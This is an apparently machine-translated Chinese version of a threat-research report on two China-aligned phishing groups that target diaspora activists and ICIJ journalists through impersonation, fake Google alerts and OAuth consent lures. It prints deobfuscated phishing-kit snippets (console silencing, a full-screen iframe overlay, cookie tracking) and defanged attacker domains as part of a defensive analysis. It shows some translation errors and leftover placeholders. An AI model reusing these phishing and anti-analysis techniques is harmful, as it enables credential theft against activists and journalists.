奇闻轶事
中国演员如何利用冒名顶替和窃取的叙事来延续跨国数字压制
我们与国际调查记者联盟(ICIJ)合作,识别出两个与中华人民共和国结盟的、专门针对记者和公民社会的组织,并冒充他们进行攻击。我们的研究结果揭示了中国政府实施跨国数字镇压的手段,以及其转向由私人承包商执行国家支持攻击的模式。
概述
我们与国际调查记者联盟(ICIJ)合作,识别出两个与中华人民共和国结盟的独立行动者。本报告第一部分讨论了我们追踪的代号为“闪光鲤鱼”(GLITTER CARP)的行动者, 他们既针对ICIJ的多名成员,也冒充他们。第二部分 讨论了我们追踪的代号为“亮片鲤鱼”(SEQUIN CARP)的行动者,他们的主要目标是ICIJ记者斯西拉·阿莱奇(Scilla Alecci)以及其他报道中国政府高度关注议题的国际记者。这两个行动者以截然不同的方式和策略针对ICIJ,揭示了中国政府实施数字跨国镇压(DTR)的实践,以及其向军民融合体系的转变——即由私人承包商实施的国家支持攻击。
Key Findings
GLITTER CARP
- 自 2025 年 4 月以来,我们观察到针对维吾尔族、藏族、台湾和香港侨民活动人士以及报道与这些群体相关问题的记者的大规模网络钓鱼邮件和数字身份冒充活动。
- 该演员在网络钓鱼邮件中采用了精心设计的数字冒充方案,包括冒充知名人士和科技公司安全警报。
- 尽管目标群体各不相同,但这种活动在所有案例中都采用了相同的基础设施和策略,经常在多个目标上重复使用相同的域名和相同的冒充人员。
- 网络安全公司Proofpoint也记录了这一基础设施和活动,并观察到针对其他与中国政府利益一致的实体的攻击。
- 我们评估认为,此次行动背后的组织可能只专注于初步获取电子邮件账户的访问权限。这种策略可能表明,该组织与中国军民融合体系内的特定合同存在关联,该体系利用民用承包商,而其他组织则通过定向监控、设备入侵和协同骚扰等手段实施数据泄露威胁。
SEQUIN CARP
- 自 2025 年 6 月以来,我们观察到一场针对报道中国共产党(中共)跨国镇压行为的记者的网络钓鱼活动,特别是针对参与国际调查记者联盟(ICIJ)“中国目标”调查的记者。
- 这场网络钓鱼活动利用了篡改的叙事和精心塑造的角色,旨在吸引报道中国相关话题的记者的兴趣;然而,参与者经常犯一些操作上的错误。
- 攻击者试图通过社交工程手段诱使目标用户授予第三方 OAuth 令牌访问权限,从而获得对电子邮件帐户的持久访问权限,滥用合法的系统功能达到恶意目的。
- 这项行动与中国政府为监视和恐吓海外侨民社区和记者而开展的更广泛、系统性的努力是一致的,这些侨民和记者致力于提高人们对中国政府镇压行为的认识,并使其透明化。
介绍
中国政府长期以来一直骚扰其认定的海外反对派。自上世纪90年代以来,中国当局就威胁居住在海外、表达反对共产党威权统治的中国公民。在随后的几十年里,中国政府将打击目标扩大到民主运动之外的其他批评者,包括藏族、维吾尔族、台湾族和香港族等海外人士,以及法轮功海外修炼者。为了压制这些被政府称为“五毒”的群体,中国国家安全人员及其代理人对示威者进行人身攻击,威胁活动人士的家人,并强行遣返或绑架异见人士或受迫害的少数民族成员,而这些行为往往得到友好威权政府的支持。
中共一直否认其试图压制海外批评人士,并驳斥所谓的“跨国镇压”的虚假叙事。相反,中国政府将其在全球范围内追捕海外反对派的行为,包装成打击非法反国家活动的合法执法行动。外交部发言人为香港政府悬赏缉拿流亡民主活动人士的决定辩护,称其为“捍卫中国主权和安全的必要行动”以及“打击海外反华、破坏稳定的逃犯和组织的合法行动”。政府发言人还称,美国司法部指控40名中国警察涉嫌以网络骚扰方式骚扰海外异见人士的决定“完全出于政治动机”。
中国针对“五毒”的打击
在习近平主席(2012年至今)的领导下,中国成为跨国镇压的主要实施者之一,有记录显示,其镇压对象包括藏人、维吾尔族人、法轮功学员、台独支持者和民主活动人士。中国政府将这些群体视为“五毒”,并认为他们威胁国家安全。习近平政府回归观察人士所称的“个人主义一人统治”,并强调“全面国家安全”,这加剧了其在海外的胁迫行为,强化了中国政府长期以来对政治异议的零容忍态度。
随着中国国内对异己人士的镇压日益加剧,习近平政府也扩大了海外镇压目标的范围。中国政府跨国镇压行动的一个关键组成部分是利用网络威胁打击海外异己。自2000年代末以来,流亡政治活动人士和组织一直受到与中国政府相关的远程监控。这些监控手段包括:部署恶意软件秘密监视海外藏人机构使用的数字设备;通过社交媒体直接威胁记录中国政府侵犯人权行为的作家和活动人士;以及利用网络平台加大对与中国或香港有联系的外国政治候选人的恐吓力度。除了“五毒”之外,与中国政府有关联的人员还对女性记者发起有组织的网络骚扰活动; 2020年中国政府在香港实施《国家安全法》后,香港警方悬赏缉拿流亡的民主活动人士。这些形式的“直接威胁”加剧了受害者及其所在社区的自我审查、恐惧和不信任,许多人担心参与海外维权活动会招致中国当局的报复。
中国数字跨国镇压中承包商的使用
中国利用非国家网络力量开展网络行动至少可以追溯到上世纪90年代,当时“爱国黑客社群”的成员就被纳入网络行动。随着时间的推移,中国政府将这些技术娴熟的人员整合到正规的国家机构中,包括中国人民解放军和国家安全部。到2010年代末,中国已经发展出一种更加制度化的模式,将官方力量与私营部门的合作相结合。因此,北京的数字化行动方式也逐渐演变为一种更加分散的模式,越来越依赖商业力量来增强和扩展国家网络力量的能力。
网络能力的产业化并非自然而然地形成,而是国家政策积极推动的结果。2017年,习近平将军民融合提升为正式的国家战略,并亲自主持新成立的中央军民融合发展委员会的工作。在国际上,这一战略被视为中国有意模糊军民两界界限的举措。根据这项国家安全战略,私营企业必须与国家机关合作。军民融合为私营网络安全公司竞标国家合同创造了结构性激励机制,有效地构建了过去十年承包商生态系统发展的法律和制度框架。
近期证据表明,这一生态系统已演变为高度工业化和市场驱动的生态系统。从中国承包公司宜顺(I-Soon,后被美国和欧盟制裁)泄露的文件揭示了一个系统:私营承包商开发包括间谍软件、钓鱼工具包和硬件植入在内的攻击性网络工具,并将其出售给国家客户,例如国家安全部、解放军和地方公安局。这些泄露的文件,以及随后对诸如Knownsec等承包商的披露,表明存在一个竞争环境,多家公司提供从侦察、社交媒体监控到长期后渗透活动等各种服务。实际上,这些公司充当了国家网络能力的延伸。
I-Soon泄露的数据(公民实验室将I-Soon追踪为POISON CARP)也凸显了这种模式对中国政府而言的成本效益。泄露的文件显示,一些数字按西方标准来看似乎并不高:从越南经济部收集数据的价格约为5.5万美元,而访问越南交警网站的价格仅为1.5万美元。泄露文件中披露的其他价格和客户名单表明,这种模式以规模为导向,专注于大批量、低成本的运营,而非定制化的高端服务。这种模式可能并非I-Soon独有,泄露文件中还包含有关攻击性工具商业市场的短信对话,表明了这一点。
中国境外的法律和刑事诉讼进一步证实了这一黑客生态系统的存在。2020年9月16日公布的一份起诉书中,美国当局指控与中国私营网络安全公司成都404网络技术有限公司有关联的黑客,与国家关联机构合作,在全球范围内对超过100名受害者实施入侵。最近,在2025年3月,美国司法部起诉了12名中国公民,指控他们参与了一个受国家安全部和公安部指使的“雇佣黑客”生态系统,旨在“……在全球范围内压制言论自由和异议”。起诉书还指控,其中一些黑客独立实施入侵,然后将获取的数据出售给中国政府。值得注意的是,起诉书提到了中国网络攻击公司I-Soon,该公司在2024年的数据泄露事件,为了解中国商业网络运营商提供的产品和服务以及中国商业间谍生态系统的 内部政治提供了前所未有的视角。
这种工业化模式对易受跨国数字镇压影响的群体意义重大。当进攻性网络能力能够以如此低廉的价格获取时,针对海外侨民群体的成本大幅下降。这进一步降低了参与跨国镇压的政府开展大规模行动的门槛,例如本报告中记录的那些行动。将行动外包给私人安保承包商也为国家行为体提供了一层可信的否认机制,使其能够在投射力量的同时,使归因变得复杂。更广泛地说,网络战的私有化——无论是在中国还是在全球范围内——都削弱了监督,加剧了安全风险,助长了网络军备竞赛,并最终侵蚀了冲突和保护平民的规范。
调查这些攻击
过去一年,公民实验室与全球合作伙伴携手,追踪了两个不同的组织针对藏族、维吾尔族、台湾族和支持民主的海外侨民,以及报道相关议题的国际记者发起的定向网络攻击。我们观察到的许多攻击都始于国际调查记者联盟(ICIJ)发布“中国目标”报告之后,与此同时,公民实验室也发布了一份关于维吾尔族侨民组织遭受网络攻击的独立研究报告。这些调查的开展得益于持续的合作与宣传,记者和侨民社区成员都参与了报道工作。
基于受害者报告、此前对同一基础设施的报道以及此次攻击中使用的基础设施的技术特征,我们高度确信这些攻击是应中国政府的要求而实施的。这些网络攻击凸显了中共针对流亡海外侨民群体的系统性行动,并表明其为控制信息以支持其持续进行的跨国镇压行动,不惜采取任何手段。
我们追踪的第一个组织,我们称之为“闪光鲤鱼”(GLITTER CARP),其网络钓鱼攻击活动范围广泛且持续不断,有时甚至会选择与目标群体仅有间接联系的个人作为攻击目标。这种作案手法表明,该组织拥有雄厚的资源,似乎不受被发现或承担后果的威胁,并且明显将攻击影响置于隐蔽之上。这正是中国网络攻击的典型特征。安全厂商Proofpoint也观察到该组织曾攻击过完全无关的实体,包括台湾半导体产业,这使我们推断该组织可能隶属于承包商生态系统,并基于一系列不同的、互不相关的合同开展活动。
我们将第二组称为“亮片鲤鱼”(SEQUIN CARP)。该组也使用网络钓鱼攻击,但我们观察到其专门针对记者,并且在某些情况下,会使用基于真实人物精心打造的虚假身份。与第一组相比,我们发现该组在攻击的社会工程方面投入的精力远大于技术执行,操作失误频频,且在初始尝试遇到困难时无法迅速转向其他攻击途径。下表概述了两组之间的主要区别,并解释了为何尽管目标有所重叠,我们仍将它们视为不同的实体进行追踪。
| 特征 |
GLITTER CARP |
SEQUIN CARP |
| 主要技术 |
通过虚假登录页面窃取凭证 |
OAuth 授权同意钓鱼 |
| 受害者需要提供密码 |
是的,直接采摘 |
不,使用的是 OAuth 令牌。 |
| MFA绕过 |
部分(TOTP 代码可以在 AiTM 变体中转发) |
通过合法的 OAuth 流程完全绕过 |
| 密码更改后仍然有效 |
不,需要新的凭证。 |
是的,通过 OAuth 令牌进行的应用访问权限在密码更改后仍然存在。 |
| 成功跟踪方法 |
电子邮件中的跟踪像素 |
链接点击时,sctapi.ftqq.com(一个用于发送推送通知的合法中国服务)会发出请求。 |
| 社会工程投资 |
中等程度:冒充他人、虚假安全警报 |
高:拥有社交媒体影响力的支持型人物 |
| 运行安全质量 |
低:发件人/姓名不匹配频繁,自动化痕迹 |
低:角色管理失败,重复使用相同技巧 |
| 关键检测方法 |
检查发件人电子邮件地址,并通过其他通信方式验证身份。 |
审核 OAuth 权限,检查 OAuth 同意屏幕应用详情 |
| 关键预防控制 |
防钓鱼的多因素身份验证(硬件密钥)、直接 URL 导航 |
OAuth授权意识;避免通过电子邮件链接授权应用程序。 |
第一部分:闪光鲤鱼——并非所有闪光的都是金子
意想不到的外联
2025年4月,维吾尔裔加拿大籍活动家穆罕默德·土赫提(Mehmet Tohti)收到一条WhatsApp消息,他认为发件人是一位知名的维吾尔族电影导演兼民族音乐学家。发件人询问土赫提先生是否愿意提供他的个人邮箱地址,以便发送一封包含正式请求的后续邮件。他同意了。
然而,当托赫提先生收到邮件时,却发现发件地址与导演本人无关。邮件邀请托赫提先生(一位在维吾尔族社群中德高望重的成员)观看一部即将上映的纪录片。邮件中的链接伪装成一家合法的独立纪录片发行商。托赫提先生核实了域名,确认其与一家真实的电影公司相符后,点击了链接。然而,链接并没有跳转到可以观看影片的页面,而是将他重定向到一个要求他提供谷歌账号密码的网页。托赫提先生心生疑虑,随即关闭了该网页。
之后,托赫蒂先生收到另一封冒充谷歌安全警报的电子邮件,声称他的账户遭到可疑登录。他想起之前点击过的链接,打开邮件后惊讶地发现邮件是用繁体中文写的,而他既不识字也不使用繁体中文。托赫蒂先生越来越担心,于是联系了公民实验室进行调查。
这些最初的电子邮件让我们发现了超过一百个域名,这些域名在九个月的时间里针对数十名民间社会成员,其目的都是为了窃取凭证,并可能为了中国政府的利益而进行后续行动。
我们的分析表明,“闪光鲤鱼”(GLITTER CARP)是中国跨国镇压行动的延伸,其目标广泛,包括维吾尔族维权团体、藏族维权团体、一家台湾媒体机构、一名香港维权人士以及国际调查记者联盟(ICIJ)的一名记者。这些攻击主要采用两种策略:身份冒用和虚假安全警报。该网络频繁重复使用其基础设施,使我们能够追踪针对多个受害者和不同策略的行动。图2 展示了用于攻击维权团体的基础设施,并描述了他们各自的入侵尝试。
闪光鲤鱼靶向
维吾尔活动人士
根据合作伙伴组织分享的其他邮件,我们发现此次攻击活动针对三个不同的维吾尔族维权组织:维吾尔权利倡导项目(URAP)、世界维吾尔代表大会(WUC) 3和维吾尔人权项目(UHRP) 4 。这三个组织都是领先的国际组织,致力于维护中国西北部新疆维吾尔自治区维吾尔族和其他突厥语系少数民族以及海外侨民的权利。他们共同努力,记录侵犯人权的行为,提高全球意识,并促使政策制定者追究中国政府压制其文化和社区的责任。
2025年7月,世界维吾尔代表大会(WUC)的一名领导成员收到一封电子邮件,邮件冒充一位曾公开支持维吾尔事业的欧洲某省议员。邮件赞扬了该成员的工作,并邀请其参加即将举行的活动。邀请函中的链接指向一个与被冒充议员的域名对应的子域名。然而,该链接实际上将收件人引导至攻击者的凭证窃取网站,企图窃取其登录凭证。
大约在同一时间,WUC收到了一封Amelia_Chavez_Y@pm[.]me 自称来自人权研究所的研究人员的电子邮件。目前没有任何证据表明该组织或研究人员存在。邮件附件看似是一份WUC成员可能感兴趣的研究报告,但实际上该“附件”是一个链接,点击后会下载一个远程托管的文件。如果用户打开并执行该文件,其设备就会被植入一个定制的后门程序。安全厂商Proofpoint将该后门程序追踪为“HealthKick”,而安全厂商Volexity则将其追踪为“GOVERSHELL”的早期变种。我们将在相关报告部分进一步讨论这些报告。
UHRP也成为了该网络的攻击目标,这是我们首次发现有人冒充ICIJ员工(见下文)。攻击者最初通过Signal消息联系了UHRP员工,该员工回复请求通过电子邮件联系以进行身份验证。攻击者随后发送的邮件是一封介绍性邮件,邀请UHRP成员参与一个虚构的ICIJ项目并接受采访。之后,攻击者通过Signal再次联系UHRP员工,并发送了一个链接,声称该链接指向采访问题,但实际上却是一个窃取凭证的网页。
藏族活动人士
作为此次调查的一部分,我们与西藏安全应急响应小组(TibCERT)合作,该小组是一个致力于保护藏人社区成员的联盟组织。TibCERT 还发现了多封我们认为出自 GLITTER CARP 的电子邮件。TibCERT 分析了来自不同 Proton Mail 地址的四封安全和账户警报邮件,这些邮件一旦被点击,就会将用户重定向到旨在窃取其凭据的 Google 登录页面。所有邮件都包含隐藏的追踪像素,这些像素会将信息发送回攻击者,并提供邮件打开时间和打开邮件的设备信息等详细信息。我们将在下文的技术攻击细节部分详细介绍这些追踪像素。值得注意的是,其中一封邮件发送给了 TibCERT 的主任,他同时也是西藏中央行政区的议员。
与世界公民联盟(WUC)的情况类似,一位藏人维权人士也收到了一封来自同一来源的电子邮件。Amelia_Chavez_Y@pm[.]me. 邮件内容几乎与发送给WUC的邮件完全相同,仅在发件人声称的地点和组织方面略有不同。这封邮件包含一个指向后门程序HealthKick的链接,这是我们第二次发现针对同一组织(在本例中甚至是同一人)同时进行凭证网络钓鱼和HealthKick恶意软件攻击的案例。
台湾组织
2025年5月,台湾当地媒体机构Watchout收到一封邮件,mailtocontacticij@gmail[.]com 邀请他们参与一项虚构的、以国际调查记者联盟(ICIJ)名义进行的采访。该邮箱地址并非ICIJ官方邮箱,继此前针对人权观察组织(UHRP)的攻击之后,这是我们第二次发现该网络冒充ICIJ。收件人回复后,攻击者要求将对话转移到台湾流行的即时通讯软件Line上。Line账号冒充ICIJ成员,并通过Google Drawings提供了一个包含采访问题的链接。该链接指向一张真实的Google Drawings图片,图片上显示“身份验证失败”页面。图片上的“立即验证”按钮指向一个嵌入式链接,点击该链接会将用户引导至窃取凭证的网页。
当收件人没有与谷歌绘图互动时,攻击者会发送更多Line消息来强化其网络钓鱼攻击。其中两条消息包含链接,点击后会将用户引导至一个伪造的ICIJ作者页面和一个伪造的ICIJ中国目标页面,这两个页面均托管在攻击者的基础设施上。攻击者镜像了ICIJ的官方页面,试图让用户相信他们是在与真正的ICIJ记者互动。
香港活动人士
该网络还重点攻击了流亡英国的香港民主活动人士刘嘉敏(Carmen Lau)。在一个月的时间里,刘嘉敏收到了至少13封不同的钓鱼邮件,这些邮件都发送到了她的个人邮箱,她也与我们分享了这些邮件。这些钓鱼邮件包含恶意链接,旨在窃取她的登录凭证,以及追踪像素,这些像素很可能是为了在她打开邮件时向攻击者发出警报。追踪像素还会将有限的身份信息发送回攻击者的基础设施。刘嘉敏的案例之所以引人注目,是因为收到的邮件数量之多,这表明她很可能是与中共有关的跨国镇压行动的重点目标。例如,刘嘉敏的名字出现在香港警方针对多名流亡民主活动人士发布的悬赏名单上,这些活动人士被指控违反国家安全。她还面临着一场基于性别的跨国数字镇压运动,这场运动依赖于性骚扰和在网上散布她的虚假照片。
记者
GLITTER CARP 不仅在这些攻击中冒充国际调查记者联盟 (ICIJ),而且还采用了与针对海外侨民社区相同的攻击策略。2025 年 6 月,ICIJ“中国目标”调查项目协调员斯西拉·阿莱奇 (Scilla Alecci) 收到了一封与上述类似的账户安全警报邮件。该邮件包含一个钓鱼链接和一个追踪像素,我们高度确信这两者都与此次攻击活动有关。
阿莱奇和国际调查记者联盟(ICIJ)多次成为该网络的攻击目标,这很可能是由于他们的报道所致。“闪光鲤鱼”(GLITTER CARP)并非我们观察到的唯一专门针对ICIJ和阿莱奇的犯罪团伙。在本报告的第二部分 “几颗松散的亮片”(A Few Loose Sequins)中,我们将讨论“亮片鲤鱼”(SEQUIN CARP),这是另一个专注于攻击报道涉华议题记者账户的犯罪团伙。
其他目标
总体而言,“闪光鲤鱼”网络广泛针对中共系统性迫害的五个海外侨民群体中的四个,以及揭露北京跨国镇压策略的记者。虽然我们没有发现针对法轮功的攻击,但我们发现了两个子域名,epochtimes.entryfortify[.]com 它们epechtimes0[.]org 似乎冒充法轮功的新闻机构《大纪元时报》,这表明可能存在我们尚未知晓的针对法轮功的攻击**。**
我们对这些攻击中使用的基础设施进行分析后发现,在各种攻击活动中部署了一个庞大的IP地址和域名网络。该网络的规模和范围,以及其中一百多个在针对公民社会团体的行动中未曾出现的域名,使我们评估认为,该基础设施可能支持着除本文记录的攻击之外的其他攻击。
闪光鲤鱼技术攻击细节
这些攻击中使用的基础设施至少从 2023 年起就已开始活跃,其中包括用于以下用途的域名:
- 凭证盗窃
- 跟踪像素用于收集信息,并查看钓鱼邮件何时被打开。
- 提供掩护或冒充支持,使攻击更具可信度
虽然针对每个用例都开发了特定的页面和资源,但它们都共享相同的总体基础设施,通常托管在相同的 IP 地址上。
这些域名大多通过 Namecheap 注册,少数例外包括 GMO Internet Inc 和 Gname。它们主要托管在 Bedge Co、Kaopu Cloud HK、Lightnode HK 和 Cable Giant CATV 拥有的 IP 地址上。这些实体均为亚太地区的云和网络基础设施提供商,其 IP 地址空间常被网络威胁行为者用于恶意托管和代理操作。本次分析涉及的完整域名列表见附录。
凭证和令牌盗窃基础设施
该基础设施集群的最终目标似乎是窃取访问个人电子邮件帐户所需的凭据。我们发现,大多数被攻击的帐户是谷歌帐户,但域名命名规则和外部报告显示,微软 365 帐户也成为了攻击目标。
当用户点击链接时(通常是通过电子邮件或聊天应用程序(例如 Signal 或 Line)发送的链接),他们会被重定向到一个由攻击者控制的网页,该网页会显示一个伪造的 Google 登录页面。该登录页面设计得非常逼真,旨在诱骗用户输入他们的电子邮件地址和密码,然后攻击者会窃取这些信息。
我们发现了三种不同的链接传递给目标受众的方式:
- 冒充电子邮件: 链接通常会伪装成指向云端托管的面试问卷或需要审阅的文档。攻击者很可能希望目标用户误以为需要登录账户才能查看文档,这在使用云端托管资源时很常见。
- 虚假安全警报: 冒充技术平台的电子邮件会声称账户存在未经授权的活动,用户需要登录账户进行验证,否则将面临失去访问权限的风险。在这种情况下,用户会期望被引导至登录页面并被要求输入其凭据。
- Google Drawings: 在上面提到的一个有趣的案例中,Watchout 收到了一个声称指向面试题的链接,但实际上它指向的是一个合法的 Google Drawings 页面。攻击者利用 Google Drawings 的真实功能创建了一个看似需要身份验证的“绘图”页面。该绘图中包含一个带有嵌入式链接的“按钮”,该链接指向钓鱼页面。
这三种方法都指向相同的钓鱼页面,这些页面看起来与合法的登录页面完全相同。这些钓鱼页面利用了一种技术,攻击者可以将真正的钓鱼页面隐藏在一个简单的加载页面后面,并轻松地替换或重定向登录内容(即恶意的、看似合法但实则伪造的登录页面),而无需更改主页面。为了实现这种混淆,代码会将伪造的登录界面加载到一个名为 iframe 的隐藏容器中。iframe 是一种 HTML 元素,它将另一个文档或网页嵌入到当前页面中,充当外部内容的“窗口”。这种技术隐藏了底层的恶意网页(其中包含可能暴露攻击的额外内容),并且 iframe 会扩展到覆盖整个浏览器窗口。这种策略历来被模块化钓鱼工具包所采用。
该钓鱼工具包还使用混淆的 JavaScript 代码,使页面更难分析。它隐藏可读文本并禁用浏览器的常规调试功能,从而阻止分析人员使用开发者工具轻松检查页面的运行情况。此外,它还使用 base64 编码的 cookie 在用户浏览器中存储少量信息,以跟踪受害者在钓鱼过程中的操作。
const poisonConsole = disableConsole(this, function () {
const noop = function () {};
…
globalObject.console.log = noop;
globalObject.console.warn = noop;
globalObject.console.error = noop;
// … etc
});
图 6
这是钓鱼网站反混淆代码片段,展示了控制台投毒这种反取证技术,它可以使所有浏览器开发者工具的输出保持静默,从而使用户和分析人员无法看到错误或调试页面。
// If iframe URL changed, store it in a cookie (base64 encoded)
if (currentHref !== lastHref) {
lastHref = currentHref;
document.cookie = cookieUrlName + “=” + btoa(currentHref) + cookieAttrs;
}
…
iframe.style.cssText =
“position:fixed;margin:0px;border:0;width:100%;height:100%;”;
iframe.src = iframePath; // loads /?_gnif=1
body.appendChild(iframe);
// If iframe URL changed, store it in a cookie (base64 encoded)
if (currentHref !== lastHref) {
lastHref = currentHref;
document.cookie = cookieUrlName + “=” + btoa(currentHref) + cookieAttrs;
}
…
iframe.style.cssText =
“position:fixed;margin:0px;border:0;width:100%;height:100%;”;
iframe.src = iframePath; // loads /?_gnif=1
body.appendChild(iframe);
图 7
来自钓鱼网站的反混淆代码片段,显示了用户界面欺骗和 URL 跟踪。
闪光鲤鱼追踪像素簇
在这些攻击活动中,GLITTER CARP 利用其控制的域名托管网络内容,这些内容可以作为钓鱼邮件中的追踪信标。邮件中通常包含一个隐藏的图像引用(通常为 1×1 像素),指向攻击者域名上的一个 URL。当收件人打开邮件且其邮件客户端配置为加载远程图像(通常默认开启)时,设备会自动向该服务器发出请求。此功能允许攻击者收集用户互动遥测数据,其中包括邮件打开时间、收件人的 IP 地址和大致地理位置,以及设备或邮件客户端信息等。这种追踪无需目标用户点击任何内容即可完成,这使得攻击者能够确认电子邮件帐户处于活动状态以及邮件已被打开。
该域名本身托管着看似无害的内容,几乎所有情况下都是博客页面的副本,其中包含一个西班牙鸡尾酒配方,该配方直接摘自一个真实的食谱博客。
GLITTER CARP 冒充域名
第三种类型的域名基础设施旨在冒充个人或组织,攻击者利用这些冒充者进行社会工程攻击。这些页面通常以链接的形式直接发送给个人,本身并不包含任何恶意内容,而是旨在建立与受害者之间的信任关系。
部分冒充域名是在实际攻击活动中直接发现的。其他域名则是在使用被动DNS等工具进行基础设施分析时发现的,其背后的目标定位和冒充行为则是推断出来的。
电子邮件分发域:ICJIORG[.]ORG
我们观察到,此次攻击中只有一个域名与上述大型网络有所不同。攻击者专门创建了一个域名来冒充国际调查记者联盟(ICIJ)成员。icjiorg[.]org. 该域名用于发送冒充ICIJ特定记者的电子邮件,可能是为了避免因使用Gmail或Proton等邮箱域名而引起怀疑。
注册此域名的目的似乎仅仅是为了使用其邮件服务器功能。与我们看到的其他一些冒充域名不同,该网站并非旨在模仿国际调查记者联盟(ICIJ)。该域名icjiorg[.]org 托管着一个网页框架,其中包含一个“即将上线”的国际儿童与青少年组织(International Organization for Children and Youth)页面。该网页使用 GoDaddy 网页生成器搭建,并采用了设置初始网页时使用的标准语言。网站上的文字是简体中文,这种文字几乎只在中国大陆使用,这表明网站创建者使用的是简体中文。
与该域关联的邮件服务器是
smtp.secureserver[.]net GoDaddy 工作区电子邮件客户端使用的基础架构。
相关报道
本报告描述的基础设施集群和攻击活动与Proofpoint此前报告的活动相符。Proofpoint追踪了他们观察到的、使用与UNK_SparkyCarp相同基础设施的活动。他们观察到该集群在2024年11月和2025年3月期间针对台湾半导体行业,使用了与我们观察到的针对上述组织的类似定制的中间人攻击(AiTM)网络钓鱼工具包。鉴于我们未观察到与Proofpoint报告中受害者重叠的情况,我们评估认为这些活动相关,但可能并不完全重合。
在同一份报告中,Proofpoint 还发现,另一个名为 UNK_DropPitch 的攻击者同时以台湾半导体行业的个人为目标,利用钓鱼邮件传播 HealthKick 后门程序。这些钓鱼邮件的发送邮箱地址Amelia_W_Chavez@proton[.]me 与向维吾尔族和藏族组织(世界维吾尔代表大会和 TibCERT)传播 HealthKick 的邮箱地址非常相似。
Volexity 也报告了一种名为 GOVERSHELL 变种的后门程序的传播。他们还观察到来自同一地址的电子邮件针对世界联合大会 (WUC) 和藏人Amelia_Chavez_Y@pm[.]me 。Volexity 观察到北美、亚洲和欧洲的个人都受到了攻击,而且与我们观察到的案例类似,这些电子邮件也是从虚构的组织发送的。
值得注意的是,我们的调查以及Proofpoint观察到的情况都表明,特定组织同时受到两种攻击:一种是使用AiTM钓鱼工具包(GLITTER CARP、UNK_SparkyCarp),另一种是使用不同钓鱼策略的HealthKick,后者由另一个组织(UNK_DropPitch)发起。这表明,技术能力不同的组织之间很可能存在某种形式的协同攻击。目前,我们尚不清楚这种协同是正式的、非正式的,还是像政府与承包商关系中常见的那样,由某个中心机构进行双重攻击。
第二部分:亮片鲤鱼——几颗散落的亮片……
中国目标调查
2025年4月,国际调查记者联盟(ICIJ)发布了历时十个多月的调查结果,揭露中国政府如何跨越遥远国界进行跨国镇压,恐吓、影响和控制流亡海外及侨民社区中的政府批评者、活动人士和异见人士。这项调查汇集了来自30多个国家的100多名记者,他们进行了广泛的报道和采访,揭露了中国政府使用的种种手段,包括跟踪和人身监视、恐吓家庭成员、利用国际刑警组织等国际机制以及网络入侵和监控等。
在国际调查记者联盟(ICIJ)发布调查结果后,中国外交部发言人郭家坤告诉记者,中国政府“反对某些别有用心的势力对中国正常的执法和司法合作进行无端指责、诽谤和抹黑”。这一声明与中国政府一贯驳斥其所谓的“跨国镇压”叙事的立场一致,后者通常以尊重或捍卫国家主权为框架。例如,针对两名纽约市民因涉嫌协助中国当局在纽约市设立海外派出所而被捕一事,中国政府否认了这些指控,并声称“中国坚持不干涉内政原则”。相反,中国政府一贯声称,批评者才是干涉中国内政的一方。在有报道称中国当局骚扰居住在瑞士的藏人和维吾尔人之后,外交部发言人声称,中国“绝不容忍任何外部势力干涉”其对西藏和新疆的治理。此类公开声明是中国政府长期以来将对其人权记录的批评斥为不可接受的外国“干涉”的惯用伎俩,也反映了中国共产党对任何挑战其作为中国唯一执政党合法性的势力都抱有敌意。
北京对“中国目标”系列报道的抗议表明,该系列报道显然引起了他们的注意。报道发表后不久,一系列与中国有关的网络攻击开始针对参与“中国目标”项目的国际调查记者联盟(ICIJ)记者。从2025年6月到2026年3月,公民实验室与ICIJ记者密切合作,追踪了至少三次试图渗透记者及其合作机构账户的攻击,我们将其追踪为“亮片鲤鱼”(SEQUIN CARP)。
窃取叙事
“亮片鲤鱼”式攻击的一个独特之处在于,它利用既有叙事作为攻击记者的合理借口。2025年6月4日,总部位于北京、以商业和调查报道著称的媒体门户网站财新报道称,北京市第三中级人民法院司法助理白斌涉嫌挪用高达3亿元人民币的执法资金后逃往日本。6月17日,一个名为白斌的X账号(@baoliaoX )发布了一篇长文,声称对他的指控是捏造的,并表示他保存了截图和文件,可以证明自己的清白。
这是某位自称是白斌的人发布的存档帖子的部分截图,他在帖子中声明自己无罪,并从他的角度解释了指控和情况。
三天后,国际调查记者联盟(ICIJ)记者斯西拉·阿莱奇(Scilla Alecci)——“中国目标”报告的项目协调员——收到了一封来自“白斌”的邮件,发件人是她的个人邮箱。邮件内容几乎与推特上流传的故事一模一样,包括“挪用3亿元人民币”、“逃往国外”和“与外国势力勾结”等细节。这封来自“白斌”的邮件中包含一个链接,指向一份文件档案,这些文件证明他是被冤枉的,只是更大腐败案的替罪羊。正如我们在下一节中详细解释的那样,这个链接是OAuth攻击的一部分,目的是获取阿莱奇邮箱的访问权限。
虽然邮件署名为白斌,但发件人姓名和电子邮件地址与白斌的身份不符,如下图所示。
这种钓鱼邮件缺乏一致性的情况并非本次攻击所独有。在本报告的
第一部分 中,我们也发现了一些钓鱼邮件的案例,其中发件人姓名、电子邮件地址和邮件正文中的姓名均不相同。安全公司 Volexity 也发现了这种模式,他们观察到的攻击者正是我们追踪的“GLITTER CARP”。“GLITTER CARP”使用的电子邮件地址和姓名似乎都是随机的,即使试图冒充已知人士也是如此。Volexity 在其报告中指出,这类错误表明攻击中存在自动化组件,且似乎缺乏人工监督
。
然而,报告第一部分 所述的缺乏连贯性与本节描述的活动之间存在差异。“亮片鲤鱼”(SEQUIN CARP)所犯的错误似乎反映了身份管理方面的失误*。* 即使发件人的电子邮件地址保持不变,同一邮件线程中的发件人姓名也会发生变化。与“闪光鲤鱼”(GLITTER CARP)的情况不同,此次错误使用的发件人和电子邮件地址并非随机选择,而是似乎反映了被冒充的个人身份,或者可能在其他攻击中使用过的其他虚构身份。
攻击者未能妥善管理其身份,这为研究提供了另外两个线索:汉斯·维廷 (Hans Witting) 和 [此处应填写账号名称]。vebefax002@gmail[.]com 在 X(原 Twitter)上搜索“汉斯·维廷”会发现一个账号 [@HWitting5943 此处应填写账号名称]。该账号具有虚假账号的典型特征:它创建于 2025 年 5 月,就在最初发送给 Alecci 的恶意邮件发出前不久;它使用默认头像,没有横幅,只有一条帖子,也没有关注者。该账号关注了 23 个其他账号,其中一些是中国的维权人士或异议团体,包括“卫士卫士”、“中国人权律师”和“远东青年团”。该账号还关注了日本政府账号和一些美国官员的账号。值得注意的是,这 23 个@HWitting5943 关注账号中有一个是白斌的账号 [此处应填写账号名称] @baoliaoX 。
利用开源情报(OSINT)方法,Hans Witting 账户泄露了一个部分混淆的电子邮件地址
